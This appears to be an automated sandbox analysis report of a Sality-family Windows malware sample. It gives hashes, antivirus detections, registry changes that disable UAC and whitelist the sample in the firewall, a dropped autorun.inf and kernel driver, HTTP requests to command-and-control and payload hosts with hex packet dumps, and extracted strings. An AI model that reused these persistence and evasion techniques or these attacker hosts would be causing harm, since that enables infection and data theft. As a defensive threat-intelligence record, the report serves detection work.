Analysis Date | 2014-04-30 00:33:43 |
---|---|
MD5 | c0604710fc2a026149a2f42b8ec8334e |
SHA1 | ff6428dfc70af8db22a9e220f980e1102c88d155 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: d681da53549fbe2dc3ac40c634d128ce sha1: 752dc62aad6710809884637abe0f85b1c88c5dc7 size: 173056 | |
Section | .rdata md5: e977908417aacae1d04d6617ed2fe13e sha1: 8e9d5635c1a95acfc31dac7a17fa3d3691e0ac41 size: 52736 | |
Section | .data md5: 65f01e884d3b6e859b26769f9e7c7590 sha1: f14e8216aeea33746fec0ecbe3323a0440fddb72 size: 25600 | |
Section | .reloc md5: c3e61e99dd0ff2dbb46c5ad805b89057 sha1: 10e737f326c5d0a595b0d406730c1bf50e98616b size: 3072 | |
Section | .rrdata md5: b8f51fb12624162ebe296804d5d4d12c sha1: 46c0ca587bbd681c9f981afe8c80f68fcc3e84fb size: 81920 | |
Timestamp | 2013-03-31 15:14:51 | |
Pdb path | @ | |
PEhash | 243d2ef0a15a6c94ead7205bf7a0e60a9e2542cc | |
IMPhash | 09ace0653e9a1681c71aa59f915845b3 | |
AV | F-Secure Anti-Virus 2013 | Win32.Sality.OG |
AV | AVG AntiVirus | Win32/Tanatos.M |
AV | Emsisoft Command Line Scanner | Win32.Sality.OG |
AV | Ad-Aware Command-Line | Win32.Sality.OG |
AV | 360 Safe | Win32.Sality.OG |
AV | Avira Anti-Virus Command Line Scanner | W32/Sality.Y |
AV | Microsoft Security Essentials 32bit | Virus:Win32/Sality.AM |
AV | Quick Heal AntiVirus | W32.Sality.R |
AV | Trend Micro System Cleaner (SysClean) | PE_SALITY.EN |
AV | Ikarus Command-Line Scanner | Trojan-Spy.Win32.Agent.EO |
AV | F-PROT Antivirus for Windows | W32/Sality.AK |
AV | ArcaVir 2013 Antivirus | W32.Sality.Aa |
AV | Rising Command-Line Scanner | Win32.KUKU.ky |
AV | eScan Anti-Virus | Win32.Sality.OG |
AV | McAfee Command-Line Scanner | W32/Sality.gen.z |
AV | Sunbelt Vipre Antivirus version 3.0 | Trojan.Win32.Gamarue.lvlv (v) |
AV | ESET NOD32 Antivirus | Win32/Sality.NAR virus |
AV | CA (Total Defense) Internet Security Suite | Win32/Sality.AA |
AV | VirusBlokAda (Console scanner) | Virus.Win32.Sality.kaka |
AV | Symantec Command-Line Scanner | W32.Sality.AE |
AV | Fortinet Command-Line Scanner | W32/Sality.AA |
AV | Avast! Professional Anti-Virus 8.0 | No Virus |
AV | Norman AntiVirus | win32/Sality.BBYL |
AV | Sophos Command-Line Scanner | W32/Sality-AM |
AV | Dr. Web Anti-Virus for Windows | Win32.Sector.5 |
AV | Kaspersky Anti-Virus | Virus.Win32.Sality.gen |
AV | Command Anti-Malware | W32/Sality.AK |
AV | MalwareBytes Anti-Malware PRO | No Virus |
AV | ClamWin Antivirus (Clam AV Engine) | W32.Sality-56 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Registry | HKEY_CURRENT_USER\Software\Administrator914\-993627007\1768776769 ➝ 26 |
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\malware.exe ➝ C:\malware.exe:*:Enabled:ipsec |
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Administrator914\A1_0 ➝ 3432392762 |
Registry | HKEY_CURRENT_USER\SOFTWARE\ImageBase ➝ NULL |
Creates File | C:\autorun.inf |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe |
Creates File | C:\TEMP\FILES\monitor.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp |
Creates File | C:\11ab7 |
Creates File | C:\WINDOWS\SYSTEM.INI |
Creates File | C:\uoleqe.pif |
Creates File | PIPE\SfcApi |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | PIPE\wkssvc |
Creates File | C:\TEMP\FILES\AcroRd32.exe |
Creates File | C:\122c5 |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp |
Deletes File | C:\122c5 |
Deletes File | C:\11ab7 |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe" |
Creates Mutex | services.exeM_616_ |
Creates Mutex | smss.exeM_492_ |
Creates Mutex | svchost.exeM_848_ |
Creates Mutex | svchost.exeM_804_ |
Creates Mutex | lsass.exeM_628_ |
Creates Mutex | Op1mutx9 |
Creates Mutex | userinit.exeM_236_ |
Creates Mutex | monitor.exeM_1128_ |
Creates Mutex | svchost.exeM_1016_ |
Creates Mutex | explorer.exeM_324_ |
Creates Mutex | csrss.exeM_548_ |
Creates Mutex | alg.exeM_1868_ |
Creates Mutex | malware.exeM_1280_ |
Creates Mutex | winlogon.exeM_572_ |
Creates Mutex | svchost.exeM_1108_ |
Creates Mutex | reader_sl.exeM_960_ |
Creates Mutex | spoolsv.exeM_1336_ |
Creates Mutex | svchost.exeM_1136_ |
Creates Mutex | svchost.exeM_1204_ |
Process
↳ C:\WINDOWS\system32\userinit.exe
Creates Mutex | userinit.exeM_236_ |
---|---|
Creates Mutex | Op1mutx9 |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\Explorer.EXE ➝ C:\WINDOWS\Explorer.EXE:*:Enabled:ipsec |
---|---|
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2 |
Creates File | C:\TEMP\FILES\monitor.exe |
Creates File | C:\xahynx.cmd |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe |
Creates File | C:\TEMP\FILES\NOTEPAD.EXE |
Creates File | C:\TEMP\FILES\wuauclt.exe |
Creates File | C:\17ccc |
Creates File | C:\WINDOWS\system32\drivers\sfkji.sys |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\TEMP\FILES\xmefe.exe |
Creates File | C:\170b6 |
Creates File | C:\174bd |
Creates File | C:\TEMP\FILES\msfrnr.exe |
Creates File | C:\autorun.inf |
Creates File | PIPE\srvsvc |
Creates File | C:\TEMP\FILES\reader_sl.exe |
Creates File | C:\wnbw.pif |
Creates File | asc3360pr |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | PIPE\SfcApi |
Creates File | C:\TEMP\FILES\AcroRd32.exe |
Creates File | C:\TEMP\FILES\msiexec.exe |
Deletes File | C:\174bd |
Deletes File | C:\170b6 |
Deletes File | C:\autorun.inf |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe |
Deletes File | C:\17ccc |
Deletes File | C:\WINDOWS\system32\drivers\sfkji.sys |
Creates Mutex | services.exeM_616_ |
Creates Mutex | smss.exeM_492_ |
Creates Mutex | svchost.exeM_848_ |
Creates Mutex | svchost.exeM_804_ |
Creates Mutex | lsass.exeM_628_ |
Creates Mutex | Op1mutx9 |
Creates Mutex | monitor.exeM_1128_ |
Creates Mutex | Shell.CMruPidlList |
Creates Mutex | wuauclt.exeM_1428_ |
Creates Mutex | explorer.exeM_324_ |
Creates Mutex | svchost.exeM_1016_ |
Creates Mutex | msiexec.exeM_1596_ |
Creates Mutex | csrss.exeM_548_ |
Creates Mutex | alg.exeM_1868_ |
Creates Mutex | winlogon.exeM_572_ |
Creates Mutex | svchost.exeM_1108_ |
Creates Mutex | reader_sl.exeM_960_ |
Creates Mutex | spoolsv.exeM_1336_ |
Creates Mutex | svchost.exeM_1204_ |
Creates Mutex | svchost.exeM_1136_ |
Creates Service | asc3360pr - C:\WINDOWS\system32\drivers\sfkji.sys |
Starts Service | IPFILTERDRIVER |
Starts Service | asc3360pr |
Process
↳ C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
Creates Mutex | reader_sl.exeM_960_ |
---|---|
Creates Mutex | Op1mutx9 |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"
Creates Process | C:\WINDOWS\system32\wuauclt.exe |
---|---|
Creates Mutex | msiexec.exeM_1596_ |
Creates Mutex | Op1mutx9 |
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Creates File | WMIDataDevice |
---|---|
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
---|---|
Creates File | PIPE\lsarpc |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | \Device\Afd\Endpoint |
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7 |
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00 |
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL |
Creates File | WMIDataDevice |
Process
↳ C:\WINDOWS\System32\alg.exe
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ C:\WINDOWS\system32\wuauclt.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe\\x00 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\_INSTA~1\msiexec.exe |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp |
Creates Mutex | wuauclt.exeM_1428_ |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | 3227095050 |
Creates Mutex | TLS |
Creates Mutex | Op1mutx9 |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Winsock DNS | img.suckmycocklameavindustry.in |
Winsock DNS | pe.suckmycocklameavindustry.in |
Winsock DNS | sc.suckmycocklameavindustry.in |
Network Details:
DNS | www.update.microsoft.com.nsatc.net Type: A 157.56.96.156 |
---|---|
DNS | www.update.microsoft.com.nsatc.net Type: A 207.46.114.62 |
DNS | pe.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | sc.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.231 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.252 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.253 |
DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.254 |
DNS | img.suckmycocklameavindustry.in Type: A 50.116.32.177 |
DNS | anam0rph.su Type: A 195.22.26.253 |
DNS | anam0rph.su Type: A 195.22.26.254 |
DNS | anam0rph.su Type: A 195.22.26.231 |
DNS | anam0rph.su Type: A 195.22.26.252 |
DNS | orzdwjtvmein.in Type: A 195.22.26.253 |
DNS | orzdwjtvmein.in Type: A 195.22.26.254 |
DNS | orzdwjtvmein.in Type: A 195.22.26.231 |
DNS | orzdwjtvmein.in Type: A 195.22.26.252 |
DNS | www.update.microsoft.com Type: A |
DNS | ygiudewsqhct.in Type: A |
DNS | bdcrqgonzmwuehky.nl Type: A |
HTTP GET | http://pe.suckmycocklameavindustry.in/jxsgcplzuiernbxkgtpdzmivrfboeldd User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://sc.suckmycocklameavindustry.in/anjxsgcplzuiernbxkgtpdzmivrfbovv User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP POST | http://xdqzpbcgrvkj.ru/in.php User-Agent: Mozilla/4.0 |
HTTP GET | http://img.suckmycocklameavindustry.in/thdqmavjfsocylhuqeanjxsgcplzuipp User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP POST | http://anam0rph.su/in.php User-Agent: Mozilla/4.0 |
HTTP POST | http://orzdwjtvmein.in/in.php User-Agent: Mozilla/4.0 |
Flows TCP | 192.168.1.1:1033 ➝ 157.56.96.156:80 |
Flows UDP | 192.168.1.1:1034 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1036 ➝ 50.116.32.177:80 |
Flows TCP | 192.168.1.1:1038 ➝ 50.116.32.177:80 |
Flows TCP | 192.168.1.1:1039 ➝ 195.22.26.231:80 |
Flows TCP | 192.168.1.1:1041 ➝ 50.116.32.177:80 |
Flows UDP | 192.168.1.1:1040 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1042 ➝ 195.22.26.253:80 |
Flows UDP | 192.168.1.1:1043 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1044 ➝ 195.22.26.253:80 |
Flows UDP | 192.168.1.1:1045 ➝ 8.8.4.4:53 |
Flows UDP | 192.168.1.1:1046 ➝ 8.8.4.4:53 |
Raw Pcap
0x00000000 (00000) 47455420 2f6a7873 6763706c 7a756965 GET /jxsgcplzuie 0x00000010 (00016) 726e6278 6b677470 647a6d69 76726662 rnbxkgtpdzmivrfb 0x00000020 (00032) 6f656c64 64204854 54502f31 2e310d0a oeldd HTTP/1.1.. 0x00000030 (00048) 41636365 70743a20 2a2f2a0d 0a416363 Accept: */*..Acc 0x00000040 (00064) 6570742d 456e636f 64696e67 3a20677a ept-Encoding: gz 0x00000050 (00080) 69702c20 6465666c 6174650d 0a557365 ip, deflate..Use 0x00000060 (00096) 722d4167 656e743a 204d6f7a 696c6c61 r-Agent: Mozilla 0x00000070 (00112) 2f342e30 2028636f 6d706174 69626c65 /4.0 (compatible 0x00000080 (00128) 3b204d53 49452036 2e303b20 57696e64 ; MSIE 6.0; Wind 0x00000090 (00144) 6f777320 4e542035 2e313b20 5356313b ows NT 5.1; SV1; 0x000000a0 (00160) 202e4e45 5420434c 5220322e 302e3530 .NET CLR 2.0.50 0x000000b0 (00176) 37323729 0d0a486f 73743a20 70652e73 727)..Host: pe.s 0x000000c0 (00192) 75636b6d 79636f63 6b6c616d 65617669 uckmycocklameavi 0x000000d0 (00208) 6e647573 7472792e 696e0d0a 436f6e6e ndustry.in..Conn 0x000000e0 (00224) 65637469 6f6e3a20 4b656570 2d416c69 ection: Keep-Ali 0x000000f0 (00240) 76650d0a 0d0a ve.... 0x00000000 (00000) 47455420 2f616e6a 78736763 706c7a75 GET /anjxsgcplzu 0x00000010 (00016) 6965726e 62786b67 7470647a 6d697672 iernbxkgtpdzmivr 0x00000020 (00032) 66626f76 76204854 54502f31 2e310d0a fbovv HTTP/1.1.. 0x00000030 (00048) 41636365 70743a20 2a2f2a0d 0a416363 Accept: */*..Acc 0x00000040 (00064) 6570742d 456e636f 64696e67 3a20677a ept-Encoding: gz 0x00000050 (00080) 69702c20 6465666c 6174650d 0a557365 ip, deflate..Use 0x00000060 (00096) 722d4167 656e743a 204d6f7a 696c6c61 r-Agent: Mozilla 0x00000070 (00112) 2f342e30 2028636f 6d706174 69626c65 /4.0 (compatible 0x00000080 (00128) 3b204d53 49452036 2e303b20 57696e64 ; MSIE 6.0; Wind 0x00000090 (00144) 6f777320 4e542035 2e313b20 5356313b ows NT 5.1; SV1; 0x000000a0 (00160) 202e4e45 5420434c 5220322e 302e3530 .NET CLR 2.0.50 0x000000b0 (00176) 37323729 0d0a486f 73743a20 73632e73 727)..Host: sc.s 0x000000c0 (00192) 75636b6d 79636f63 6b6c616d 65617669 uckmycocklameavi 0x000000d0 (00208) 6e647573 7472792e 696e0d0a 436f6e6e ndustry.in..Conn 0x000000e0 (00224) 65637469 6f6e3a20 4b656570 2d416c69 ection: Keep-Ali 0x000000f0 (00240) 76650d0a 0d0a ve.... 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20786471 P/1.1..Host: xdq 0x00000020 (00032) 7a706263 6772766b 6a2e7275 0d0a5573 zpbcgrvkj.ru..Us 0x00000030 (00048) 65722d41 67656e74 3a204d6f 7a696c6c er-Agent: Mozill 0x00000040 (00064) 612f342e 300d0a43 6f6e7465 6e742d54 a/4.0..Content-T 0x00000050 (00080) 7970653a 20617070 6c696361 74696f6e ype: application 0x00000060 (00096) 2f782d77 77772d66 6f726d2d 75726c65 /x-www-form-urle 0x00000070 (00112) 6e636f64 65640d0a 436f6e74 656e742d ncoded..Content- 0x00000080 (00128) 4c656e67 74683a20 38340d0a 436f6e6e Length: 84..Conn 0x00000090 (00144) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x000000a0 (00160) 0a757071 63684373 38764654 4b464f56 .upqchCs8vFTKFOV 0x000000b0 (00176) 6d6e494b 47497769 4c72486f 33567436 mnIKGIwiLrHo3Vt6 0x000000c0 (00192) 38543379 71766851 75325471 6574516e 8T3yqvhQu2TqetQn 0x000000d0 (00208) 33714979 37513662 70546644 55745949 3qIy7Q6bpTfDUtYI 0x000000e0 (00224) 66745a33 334e4230 424b516b 67396d59 ftZ33NB0BKQkg9mY 0x000000f0 (00240) 3371773d 3d0a 3qw==. 0x00000000 (00000) 47455420 2f746864 716d6176 6a66736f GET /thdqmavjfso 0x00000010 (00016) 63796c68 75716561 6e6a7873 6763706c cylhuqeanjxsgcpl 0x00000020 (00032) 7a756970 70204854 54502f31 2e310d0a zuipp HTTP/1.1.. 0x00000030 (00048) 41636365 70743a20 2a2f2a0d 0a416363 Accept: */*..Acc 0x00000040 (00064) 6570742d 456e636f 64696e67 3a20677a ept-Encoding: gz 0x00000050 (00080) 69702c20 6465666c 6174650d 0a557365 ip, deflate..Use 0x00000060 (00096) 722d4167 656e743a 204d6f7a 696c6c61 r-Agent: Mozilla 0x00000070 (00112) 2f342e30 2028636f 6d706174 69626c65 /4.0 (compatible 0x00000080 (00128) 3b204d53 49452036 2e303b20 57696e64 ; MSIE 6.0; Wind 0x00000090 (00144) 6f777320 4e542035 2e313b20 5356313b ows NT 5.1; SV1; 0x000000a0 (00160) 202e4e45 5420434c 5220322e 302e3530 .NET CLR 2.0.50 0x000000b0 (00176) 37323729 0d0a486f 73743a20 696d672e 727)..Host: img. 0x000000c0 (00192) 7375636b 6d79636f 636b6c61 6d656176 suckmycocklameav 0x000000d0 (00208) 696e6475 73747279 2e696e0d 0a436f6e industry.in..Con 0x000000e0 (00224) 6e656374 696f6e3a 204b6565 702d416c nection: Keep-Al 0x000000f0 (00240) 6976650d 0a0d0a ive.... 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20616e61 P/1.1..Host: ana 0x00000020 (00032) 6d307270 682e7375 0d0a5573 65722d41 m0rph.su..User-A 0x00000030 (00048) 67656e74 3a204d6f 7a696c6c 612f342e gent: Mozilla/4. 0x00000040 (00064) 300d0a43 6f6e7465 6e742d54 7970653a 0..Content-Type: 0x00000050 (00080) 20617070 6c696361 74696f6e 2f782d77 application/x-w 0x00000060 (00096) 77772d66 6f726d2d 75726c65 6e636f64 ww-form-urlencod 0x00000070 (00112) 65640d0a 436f6e74 656e742d 4c656e67 ed..Content-Leng 0x00000080 (00128) 74683a20 38340d0a 436f6e6e 65637469 th: 84..Connecti 0x00000090 (00144) 6f6e3a20 636c6f73 650d0a0d 0a757071 on: close....upq 0x000000a0 (00160) 63684373 38764654 4b464f56 6d6e494b chCs8vFTKFOVmnIK 0x000000b0 (00176) 47497769 4c72486f 33567436 38543379 GIwiLrHo3Vt68T3y 0x000000c0 (00192) 71766851 75325471 6574516e 33714979 qvhQu2TqetQn3qIy 0x000000d0 (00208) 37513662 70546644 55745949 66745a33 7Q6bpTfDUtYIftZ3 0x000000e0 (00224) 334e4230 424b516b 67396d59 3371773d 3NB0BKQkg9mY3qw= 0x000000f0 (00240) 3d76650d 0a0d0a =ve.... 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 206f727a P/1.1..Host: orz 0x00000020 (00032) 64776a74 766d6569 6e2e696e 0d0a5573 dwjtvmein.in..Us 0x00000030 (00048) 65722d41 67656e74 3a204d6f 7a696c6c er-Agent: Mozill 0x00000040 (00064) 612f342e 300d0a43 6f6e7465 6e742d54 a/4.0..Content-T 0x00000050 (00080) 7970653a 20617070 6c696361 74696f6e ype: application 0x00000060 (00096) 2f782d77 77772d66 6f726d2d 75726c65 /x-www-form-urle 0x00000070 (00112) 6e636f64 65640d0a 436f6e74 656e742d ncoded..Content- 0x00000080 (00128) 4c656e67 74683a20 38340d0a 436f6e6e Length: 84..Conn 0x00000090 (00144) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x000000a0 (00160) 0a757071 63684373 38764654 4b464f56 .upqchCs8vFTKFOV 0x000000b0 (00176) 6d6e494b 47497769 4c72486f 33567436 mnIKGIwiLrHo3Vt6 0x000000c0 (00192) 38543379 71766851 75325471 6574516e 8T3yqvhQu2TqetQn 0x000000d0 (00208) 33714979 37513662 70546644 55745949 3qIy7Q6bpTfDUtYI 0x000000e0 (00224) 66745a33 334e4230 424b516b 67396d59 ftZ33NB0BKQkg9mY 0x000000f0 (00240) 3371773d 3d0d0a 3qw==..
Strings
.U ..... $ $. M .j . .U - . ~ m . . .,. . .?. . r. A@ s dfe e.rp ((((( H jV.s @l/@ -PS Rar s de tDiG ussm $$"0$$$ 0 0&0*00040:0>0D0H0N0R0X0\0b0f0l0p0v0z0 050<0@0D0H0L0P0T0X0 0b0h0l0p0t0 0Z0`0l0 1$1*10161<1B1H1N1T1Z1`1f1 1%1@1G1L1P1T1q1 1:2@2D2H2L2 =&=1=6=@=E=z= 1 o~h3 2(232E2P2W2\2o2 2^2d2k2t2{2 23ug$$ 2cr@Lrad :":*:2:::D:M:U:l:u: :!:':,:2:;:D:M:X:c:i:}: :!:2:e:s: ? :2j%a 2~k=wx 2rf.l% 2sYnFR 2toeFl $$2$$V 3*303>3I3^3f3l3q3w3 3$3<3\3 353l3r3J4T4_4l4y4 36Uuu 3(ecc|Qu 3<"HI`k 3Q#4X8 3RXV]@P ^3Se]x 3$$u W >3?=?W?]?f?~? 3x3+xPu 4(404;4I4~4 4"4)484B4I4P4V4l4s4z4 4,545:5@5F5K5Q5Y5_5g5o5u5 464?4H4O4_4q4 +4@#{rIM ?*?4???S?a?n?t?z? 54zxCV^ 5-535C5N5`5s5~5 5"5?5I5W5b5j5 5%5:5k5r5 5)6A6q6 5hbGGu 5i&UU6 5j$$Vrjj $$)5*SS] 5uYSVV 5U]Yx'Vx !.;5"wT 616K6Q6d6j6p6u6}6 6*636P6 6$6(60646<6@6H6L6 66'OFj 696G6x6~6 6Je?-8 $$6L$$ $6$.q\ 6S$$\GGg 6UMMB1MM ;%;,;7;@; 7%1MMj 7%7+707D7Q7W7k7t7~7 7$7,72787M7S7`7f7p7x7~7 7>7D7e7o7z7 .7x"zZ$6 8$$$;$ 858L8g8 8%8/858x8 8&8F8X8s8y8 8;|;9|M 8c0!Ap 8=&j5+%f $$$8$jj 8/,q"0 $8QFMy 8UWxiT [94gU94 9#929;9A9Q9_9t9z9 9&9,91979G9P9j9{9 9$9=9G9R9\9j9~9 9%9C9T9g9|9 9Ede o @9 GGuu 9JMM[- >9PNa\ 9UruuUqU a$,$$$] aasiN, abnormal program termination aGG$\$ AJcot@ .%aJxI AK]/jSS" = >A>O>V>a>s>~> Ap`1`z{ =%=+=A=R=[=a=r=x= A/r@in ASji'j "a$$SwS aUUM'M AuuU|QUG AxSSjV b8bN]0_D B+ezG8& $$$BF*$ ?#bL4; bMMUKU Bn=OdM B.rrdata $$bSSG @b??_@t B?v`J@KbA B~zu]} $@c$$$ c>6 1t __C'E $c $MM cN dio CompareStringA CompareStringW C?oR@? CpD2'Q {!c\@r CroPSW: CUb;UGG= $$$c$u^t <!<D<^<c<v<|< dgU:h) *<d>hz N' di e c djG%xG\ ,d,_.l :~:(^dm @D$$MFM DMMOjuj dM ~v{ DOMAIN error D:\Other\Opposite\Chord\Will\Test\ask\Farm\over\surfaceFight.pdb dr@mpi DSUVWh dt5Jdl d/tbIo DUq$$$ dUTUGG DU_;UMM$ dYMkRxj $$E`$$ E@7]VE e8"lZbj6L e bhl e$$@$$$h$ $[$$EL$ EnterCriticalSection e. ou e@rVCar Es tse et trhe +E$$U$UUU /EvYz#N ExitProcess F?esjM f`GSS9 filo Fj.q3` FjtjMM8SS FlF=+t - floating point not loaded $f$MMvX F$$$.$MMZ FreeEnvironmentStringsA FreeEnvironmentStringsW f$$S$S FxN|<<] |F^y`C G3\MkT+G g++7*lY GetACP GetActiveWindow GetCommandLineA GetCommandLineW GetCPInfo GetCurrentProcess GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLocalTime GetModuleFileNameA GetModuleFileNameW GetModuleHandleA GetOEMCP GetProcAddress GetStartupInfoA GetStartupInfoW GetStdHandle GetStringTypeA GetStringTypeW GetSystemTime GetSystemTimeAsFileTime GetTimeZoneInformation GetVersion GetVolumeInformationW GG>d$$ GGG'$$$'$ GGI:UU GGj[j$$ GGju4j GG$k$jj GGMjqM $GG._rMM GGShLS GGt|rUU GG$;$u $GG'UU GGuXu$$ Gh7GGG GI=G$) Gjj1jjSf Gj%nY, Gk&G$%R$ GkRG$$* GLGUU^ Go=G $$ ?gqSauS '$G%RG GSGSS< gS$$o] $g$SSy gthe.rc ,GUs!L .GUSUjj4 GU+ (U gUUM>M GVjGUk Gx3(t_ :G$$y%jj $$($$H H5;6., h$$5UU h7f4E; H' CQp HeapAlloc HeapCreate HeapDestroy HeapFree HeapReAlloc Hg)U1;, HGUUyMM hK#hV5 HMM$jj$UU5 h naigeNn hNx`cpv )HSGGb9 }htGLE HUdXpU$$ $$HuuY hwa0,ur H:Z3 -w :HzTY+$ IAb\/O Ic"IY~Qz ID+eUU iH`;-H .II}]o I$j0j$]q3$ in..A/ InitializeCriticalSection iPzllK, :.:I:r: is@ItVe $I$SSe (It&(fY <%=*=I=V=c=m=w= Izy$$$ ^$%@}j j5cp"? j5jM@GOM /J6T$M JanFebMarAprMayJunJulAugSepOctNovDec $$j[bj jDfjSS jGGE$$ jGGt$$ jhY8=cd _[jj$;$ $$< jj )jjDUU4 jjg\$$Mi jjGMUU jjGqqG jj_$$i jj[jj/ $jjm1$$P %jj#MMH6 jjMpMjjh ]jjSaS jjub^u jjU\U$ $[$j@jv. jJVjMM jjV[UOU jMin\L: j[mKl{V JNuE [& j;pj$$ Jp-PE, %$jQ2j jq j$$ js$k"~ jtjUhU JUU"$$ jUUL8$$ ju,vyG 